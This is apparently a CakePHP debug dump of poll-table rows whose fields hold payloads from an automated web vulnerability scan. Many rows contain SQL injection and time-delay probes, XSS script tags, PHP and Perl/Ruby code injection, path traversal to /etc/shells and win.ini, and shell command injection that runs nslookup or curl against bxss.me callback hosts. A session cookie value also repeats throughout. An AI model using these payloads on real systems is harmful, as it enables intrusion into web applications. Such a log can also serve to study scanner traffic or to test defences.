(int) 6968 => array(
'id' => '7511',
'ip' => 'https://bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6969 => array(
'id' => '7512',
'ip' => '85.190.233.47',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 6970 => array(
'id' => '7513',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6971 => array(
'id' => '7514',
'ip' => '85.190.233.47',
'ip1' => ''.gethostbyname(lc('hitzr'.'ytlacqgfd550d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(71).chr(105).chr(76).'',
'sondage_id' => '2'
),
(int) 6972 => array(
'id' => '7515',
'ip' => '85.190.233.47',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 6973 => array(
'id' => '7516',
'ip' => '/etc/shells',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6974 => array(
'id' => '7517',
'ip' => 'https://bxss.me/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6975 => array(
'id' => '7518',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6976 => array(
'id' => '7519',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6977 => array(
'id' => '7520',
'ip' => 'https://bxss.me/\',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6978 => array(
'id' => '7521',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6979 => array(
'id' => '7522',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6980 => array(
'id' => '7523',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6981 => array(
'id' => '7524',
'ip' => '85.190.233.47',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(109).concat(74).concat(113).concat(90)+(require"socket"
Socket.gethostbyname("hitbr"+"fwvgkscr53520.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 6982 => array(
'id' => '7525',
'ip' => 'c:/windows/win.ini',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6983 => array(
'id' => '7526',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6984 => array(
'id' => '7527',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6985 => array(
'id' => '7528',
'ip' => 'xfs.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6986 => array(
'id' => '7529',
'ip' => '85.190.233.47',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(122).concat(72).concat(118).concat(85)+(require'socket'
Socket.gethostbyname('hitqo'+'hzenlkfwb066d.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 6987 => array(
'id' => '7530',
'ip' => '85.190.233.47',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 6988 => array(
'id' => '7531',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6989 => array(
'id' => '7532',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6990 => array(
'id' => '7533',
'ip' => '85.190.233.47',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 6991 => array(
'id' => '7534',
'ip' => '85.190.233.47',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(102).concat(89).concat(111).concat(74)+(require'socket'
Socket.gethostbyname('hitgy'+'haxxohldcd9a6.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 6992 => array(
'id' => '7535',
'ip' => '85.190.233.47',
'ip1' => '".gethostbyname(lc("hitmc"."vivfjzrfe1963.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(89).chr(119).chr(81)."',
'sondage_id' => '2'
),
(int) 6993 => array(
'id' => '7536',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6994 => array(
'id' => '7537',
'ip' => '85.190.233.47',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 6995 => array(
'id' => '7538',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6996 => array(
'id' => '7539',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6997 => array(
'id' => '7540',
'ip' => ''"()',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6998 => array(
'id' => '7541',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6999 => array(
'id' => '7542',
'ip' => '85.190.233.47',
'ip1' => 'gethostbyname(lc('hitbn'.'ajlphdxw7b662.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(81).chr(116).chr(83)',
'sondage_id' => '2'
),
(int) 7000 => array(
'id' => '7543',
'ip' => '85.190.233.47',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 7001 => array(
'id' => '7544',
'ip' => ''"',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7002 => array(
'id' => '7545',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7003 => array(
'id' => '7546',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7004 => array(
'id' => '7547',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7005 => array(
'id' => '7548',
'ip' => '85.190.233.47',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 7006 => array(
'id' => '7549',
'ip' => '85.190.233.47',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 7007 => array(
'id' => '7550',
'ip' => '<!--',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7008 => array(
'id' => '7551',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7009 => array(
'id' => '7552',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7010 => array(
'id' => '7553',
'ip' => '85.190.233.47',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 7011 => array(
'id' => '7554',
'ip' => '85.190.233.47',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 7012 => array(
'id' => '7555',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7013 => array(
'id' => '7556',
'ip' => '85.190.233.47',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 7014 => array(
'id' => '7557',
'ip' => '85.190.233.47',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 7015 => array(
'id' => '7558',
'ip' => '85.190.233.479333255',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7016 => array(
'id' => '7559',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7017 => array(
'id' => '7560',
'ip' => '85.190.233.47',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 7018 => array(
'id' => '7561',
'ip' => '85.190.233.47',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 7019 => array(
'id' => '7562',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7020 => array(
'id' => '7563',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7021 => array(
'id' => '7564',
'ip' => '85.190.233.47',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 7022 => array(
'id' => '7565',
'ip' => '85.190.233.47',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 7023 => array(
'id' => '7566',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'"()&%<zzz><ScRiPt >EosS(9570)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7024 => array(
'id' => '7567',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7025 => array(
'id' => '7568',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7026 => array(
'id' => '7569',
'ip' => '85.190.233.47',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 7027 => array(
'id' => '7570',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7028 => array(
'id' => '7571',
'ip' => '85.190.233.47',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 7029 => array(
'id' => '7572',
'ip' => '85.190.233.47',
'ip1' => 'echo vnzqca$()\ zdsqxl\nz^xyu||a #' &echo vnzqca$()\ zdsqxl\nz^xyu||a #|" &echo vnzqca$()\ zdsqxl\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 7030 => array(
'id' => '7573',
'ip' => '85.190.233.47',
'ip1' => ''"()&%<zzz><ScRiPt >EosS(9021)</ScRiPt>',
'sondage_id' => '2'
),
(int) 7031 => array(
'id' => '7574',
'ip' => '85.190.233.47',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
(int) 7032 => array(
'id' => '7575',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7033 => array(
'id' => '7576',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'&&sleep(27*1000)*tclloj&&'',
'sondage_id' => '2'
),
(int) 7034 => array(
'id' => '7577',
'ip' => '85.190.233.47',
'ip1' => '&echo lryxji$()\ ftccql\nz^xyu||a #' &echo lryxji$()\ ftccql\nz^xyu||a #|" &echo lryxji$()\ ftccql\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 7035 => array(
'id' => '7578',
'ip' => '85.190.233.47',
'ip1' => '${@print(md5(31337))}\',
'sondage_id' => '2'
),
(int) 7036 => array(
'id' => '7579',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe29481261',
'sondage_id' => '2'
),
(int) 7037 => array(
'id' => '7580',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7038 => array(
'id' => '7581',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2"&&sleep(27*1000)*pzekkf&&"',
'sondage_id' => '2'
),
(int) 7039 => array(
'id' => '7582',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2&echo vsakgo$()\ lzoxaq\nz^xyu||a #' &echo vsakgo$()\ lzoxaq\nz^xyu||a #|" &echo vsakgo$()\ lzoxaq\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 7040 => array(
'id' => '7583',
'ip' => '85.190.233.47',
'ip1' => ''.print(md5(31337)).'',
'sondage_id' => '2'
),
(int) 7041 => array(
'id' => '7584',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7042 => array(
'id' => '7585',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'||sleep(27*1000)*hlevwk||'',
'sondage_id' => '2'
),
(int) 7043 => array(
'id' => '7586',
'ip' => '85.190.233.47',
'ip1' => '|echo kgztrd$()\ toqlpa\nz^xyu||a #' |echo kgztrd$()\ toqlpa\nz^xyu||a #|" |echo kgztrd$()\ toqlpa\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 7044 => array(
'id' => '7587',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7045 => array(
'id' => '7588',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7046 => array(
'id' => '7589',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7047 => array(
'id' => '7590',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2"||sleep(27*1000)*jxdroz||"',
'sondage_id' => '2'
),
(int) 7048 => array(
'id' => '7591',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2|echo tolvya$()\ dszcuw\nz^xyu||a #' |echo tolvya$()\ dszcuw\nz^xyu||a #|" |echo tolvya$()\ dszcuw\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 7049 => array(
'id' => '7592',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7050 => array(
'id' => '7593',
'ip' => '85.190.233.47',
'ip1' => '(nslookup -q=cname hitrtvevuhjnz86f68.bxss.me||curl hitrtvevuhjnz86f68.bxss.me))',
'sondage_id' => '2'
),
(int) 7051 => array(
'id' => '7594',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7052 => array(
'id' => '7595',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7053 => array(
'id' => '7596',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7054 => array(
'id' => '7597',
'ip' => '85.190.233.47',
'ip1' => '$(nslookup -q=cname hitrpwqwyynjhbcb8f.bxss.me||curl hitrpwqwyynjhbcb8f.bxss.me)',
'sondage_id' => '2'
),
(int) 7055 => array(
'id' => '7598',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7056 => array(
'id' => '7599',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7057 => array(
'id' => '7600',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7058 => array(
'id' => '7601',
'ip' => '85.190.233.47',
'ip1' => '&nslookup -q=cname hitrbuxlcuysg51c36.bxss.me&'\"`0&nslookup -q=cname hitrbuxlcuysg51c36.bxss.me&`'',
'sondage_id' => '2'
),
(int) 7059 => array(
'id' => '7602',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7060 => array(
'id' => '7603',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7061 => array(
'id' => '7604',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7062 => array(
'id' => '7605',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7063 => array(
'id' => '7606',
'ip' => '85.190.233.47',
'ip1' => '&(nslookup -q=cname hiteigqxahlunccb5f.bxss.me||curl hiteigqxahlunccb5f.bxss.me)&'\"`0&(nslookup -q=cname hiteigqxahlunccb5f.bxss.me||curl hiteigqxahlunccb5f.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 7064 => array(
'id' => '7607',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7065 => array(
'id' => '7608',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7066 => array(
'id' => '7609',
'ip' => '85.190.233.47',
'ip1' => '|(nslookup -q=cname hitnqoqnbtqum79142.bxss.me||curl hitnqoqnbtqum79142.bxss.me)',
'sondage_id' => '2'
),
(int) 7067 => array(
'id' => '7610',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7068 => array(
'id' => '7611',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7069 => array(
'id' => '7612',
'ip' => '85.190.233.47',
'ip1' => '`(nslookup -q=cname hitxgjtprcdpp4e278.bxss.me||curl hitxgjtprcdpp4e278.bxss.me)`',
'sondage_id' => '2'
),
(int) 7070 => array(
'id' => '7613',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7071 => array(
'id' => '7614',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7072 => array(
'id' => '7615',
'ip' => '85.190.233.47',
'ip1' => ';(nslookup -q=cname hitnrxuwpqaef95d38.bxss.me||curl hitnrxuwpqaef95d38.bxss.me)|(nslookup -q=cname hitnrxuwpqaef95d38.bxss.me||curl hitnrxuwpqaef95d38.bxss.me)&(nslookup -q=cname hitnrxuwpqaef95d38.bxss.me||curl hitnrxuwpqaef95d38.bxss.me)',
'sondage_id' => '2'
),
(int) 7073 => array(
'id' => '7616',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7074 => array(
'id' => '7617',
'ip' => '85.190.233.47',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitheejpprgbd6d26e.bxss.me||curl${IFS}hitheejpprgbd6d26e.bxss.me)',
'sondage_id' => '2'
),
(int) 7075 => array(
'id' => '7618',
'ip' => 'bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7076 => array(
'id' => '7619',
'ip' => '85.190.233.47',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitjtjkyspohx815d3.bxss.me||curl${IFS}hitjtjkyspohx815d3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitjtjkyspohx815d3.bxss.me||curl${IFS}hitjtjkyspohx815d3.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 7077 => array(
'id' => '7620',
'ip' => 'scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7078 => array(
'id' => '7621',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7079 => array(
'id' => '7622',
'ip' => 'scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7080 => array(
'id' => '7623',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7081 => array(
'id' => '7624',
'ip' => 'scimat.dz:80@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7082 => array(
'id' => '7625',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7083 => array(
'id' => '7626',
'ip' => 'bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7084 => array(
'id' => '7627',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7085 => array(
'id' => '7628',
'ip' => 'bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7086 => array(
'id' => '7629',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7087 => array(
'id' => '7630',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7088 => array(
'id' => '7631',
'ip' => 'bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7089 => array(
'id' => '7632',
'ip' => '85.190.233.47'"',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7090 => array(
'id' => '7633',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7091 => array(
'id' => '7634',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7092 => array(
'id' => '7635',
'ip' => '//bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7093 => array(
'id' => '7636',
'ip' => '//scimat.dz.bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7094 => array(
'id' => '7637',
'ip' => '@@3M1E4',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7095 => array(
'id' => '7638',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7096 => array(
'id' => '7639',
'ip' => '//scimat.dz@bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7097 => array(
'id' => '7640',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7098 => array(
'id' => '7641',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7099 => array(
'id' => '7642',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7100 => array(
'id' => '7643',
'ip' => '//bxss.me\@scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7101 => array(
'id' => '7644',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7102 => array(
'id' => '7645',
'ip' => '//bxss.me#scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7103 => array(
'id' => '7646',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7104 => array(
'id' => '7647',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7105 => array(
'id' => '7648',
'ip' => '//bxss.me?scimat.dz',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7106 => array(
'id' => '7649',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7107 => array(
'id' => '7650',
'ip' => '85.190.233.47',
'ip1' => '-1 OR 2+446-446-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 7108 => array(
'id' => '7651',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7109 => array(
'id' => '7652',
'ip' => '85.190.233.47',
'ip1' => '-1 OR 2+248-248-1=0+0+0+1',
'sondage_id' => '2'
),
(int) 7110 => array(
'id' => '7653',
'ip' => 'http:bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7111 => array(
'id' => '7654',
'ip' => '85.190.233.47',
'ip1' => '-1' OR 2+875-875-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 7112 => array(
'id' => '7655',
'ip' => 'http:bxss.me/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7113 => array(
'id' => '7656',
'ip' => '85.190.233.47',
'ip1' => '-1' OR 2+585-585-1=0+0+0+1 or 'UhRzjYja'='',
'sondage_id' => '2'
),
(int) 7114 => array(
'id' => '7657',
'ip' => 'http:bxss.me/\',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 7115 => array(
'id' => '7658',
'ip' => '85.190.233.47',
'ip1' => '-1" OR 2+608-608-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 7116 => array(
'id' => '7659',
'ip' => '85.190.233.47',
'ip1' => 'if(now()=sysdate(),sleep(15),0)',
'sondage_id' => '2'
),
(int) 7117 => array(
'id' => '7660',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe20'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z',
'sondage_id' => '2'
),
(int) 7118 => array(
'id' => '7661',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe20"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z',
'sondage_id' => '2'
),
(int) 7119 => array(
'id' => '7662',
'ip' => '85.190.233.47',
'ip1' => '(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/',
'sondage_id' => '2'
),
(int) 7120 => array(
'id' => '7663',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2-1 waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 7121 => array(
'id' => '7664',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2hTcP3JIy'; waitfor delay '0:0:15' -- ',
'sondage_id' => '2'
),
(int) 7122 => array(
'id' => '7665',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2sKeewh7s' OR 461=(SELECT 461 FROM PG_SLEEP(15))--',
'sondage_id' => '2'
),
(int) 7123 => array(
'id' => '7666',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2YJTI3SiW') OR 585=(SELECT 585 FROM PG_SLEEP(15))--',
